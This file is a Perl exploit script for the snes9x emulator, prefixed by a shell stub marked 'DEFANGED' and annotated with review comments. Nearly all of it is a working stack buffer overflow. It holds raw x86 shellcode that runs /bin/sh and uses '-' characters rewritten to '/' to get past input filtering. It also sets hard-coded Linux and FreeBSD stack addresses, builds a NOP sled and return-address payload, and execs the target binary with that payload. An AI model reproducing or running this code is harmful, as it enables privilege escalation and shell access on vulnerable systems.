#!/bin/sh
echo DEFANGED.3
exit
#!/usr/bin/perl
#
# snes9x exploit written by zillion@safemode.org
#
# (safemode.org)
 
# Option parsing: consume leading "-..." arguments. Only -l and -f set
# $esp (a hard-coded stack address for Linux or FreeBSD respectively);
# any other option is silently ignored, and an explicit "--" ends option
# processing. Nothing is declared with `my` and there is no
# `use strict; use warnings;`, so every variable here is a package global.
while($_ = $ARGV[0], /^-/) {
    shift; 
    last if /^--$/;
    /^-l/ && do { $esp = 0xbfffaadc; };
    /^-f/ && do { $esp = 0xbfbfab4c; };
} 

# No platform flag selected: print usage and stop (usage() calls exit).
# Style: the plain `usage();` call form is preferred over `&usage`.
if(!$esp) {

&usage;

}


#############################################################################
# Home-brewed shellcode that does an execve of /bin/sh. Because the buffer
# is being filtered for '/' and '.', the shellcode carries -bin-sh in it
# and the '-' chars are changed to '/' at runtime (hint: check inc and
# man ascii).
#
# Review note: this is raw x86 machine code kept as a string literal; its
# length (via length($shellcode) below) determines how much filler is
# emitted before it. It is passed to the target as part of a shell
# command line, see the exec() at the bottom.


$shellcode = 
        "\xeb\x33\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x89\x76\x0b\x8d".
        "\x5e\x08\x89\x5e\x0f\x89\x46\x13\x8a\x06\xfe\xc0\xfe\xc0\x88".
        "\x06\x8a\x46\x04\xfe\xc0\xfe\xc0\x88\x46\x04\xb0\x0b\x89\xf3".
        "\x8d\x4e\x0b\x8d\x56\x13\xcd\x80\xe8\xc8\xff\xff\xff\x2d\x62".
        "\x69\x6e\x2d\x73\x68\x23\x2d\x69\x23\x41\x41\x41\x41\x42\x42".
        "\x42\x42\x43\x43\x43\x43";



#############################################################################
# Preparation of the argument that will be handed to snes9x.
#
# Review note: every constant below is tied to one particular binary and
# stack layout. $esp is a fixed guess at the stack pointer and $offset is
# added to it to form the return address written into the buffer; the
# layout presumably assumes the address lands inside the run of filler
# bytes (TODO confirm against the target build). Any stack-address
# randomization, a different compiler or a different environment size
# changes these values, which is the defensive reason such guesses are
# unreliable on current systems.


$buf = 87;    
$rest = 4002; 
$nop = "\x90";
$offset = 1000; 

# First segment: ($buf - 16) filler bytes. $buffer is never initialised
# before the first `.=`; under strict this would need `my $buffer = '';`.
for ($i = 0; $i < ($buf - 16); $i++) {
    $buffer .= $nop;
}

# pack('l') emits a 32-bit signed integer in the host's native byte
# order, so the address is written as 4 bytes little-endian on x86.
$new_ret = pack('l', ($esp + $offset));

# Four copies of the packed address (16 bytes, stepping by 4).
for ($i = 0; $i < 16; $i += 4) {
    $buffer .= $new_ret;
}


# Pad so that this segment plus the shellcode totals $rest bytes. If the
# shellcode were ever longer than $rest the loop body simply never runs;
# no check reports that case.
for ($i = 0; $i < ($rest - length($shellcode)); $i++) {
    $buffer .= $nop;
}

$buffer .= $shellcode;


#############################################################################
# Done; run the target with the prepared argument.


# sprintf('%lx') displays the same value that pack('l') encoded above.
print("New return address: 0x", sprintf('%lx',($esp + $offset)), "\n");

# Single-string exec() is handed to /bin/sh because of the quote
# characters, so every byte of $buffer passes through shell parsing. The
# argument is wrapped in single quotes and would be cut short if the
# buffer ever contained one. The list form `exec('./snes9x', $buffer)`
# would avoid the shell entirely, and exec's failure is not checked
# (no `or die`), so a missing ./snes9x goes unreported.
exec("./snes9x '$buffer'");

sub usage {
    # Show the two supported invocations (one per platform flag) and stop.
    # Reached from the option check when neither -l nor -f was given.
    my @lines = (
        "\nLinux usage:   $0 -l\n",
        "FreeBSD usage: $0 -f\n\n",
    );
    print @lines;
    exit;
}


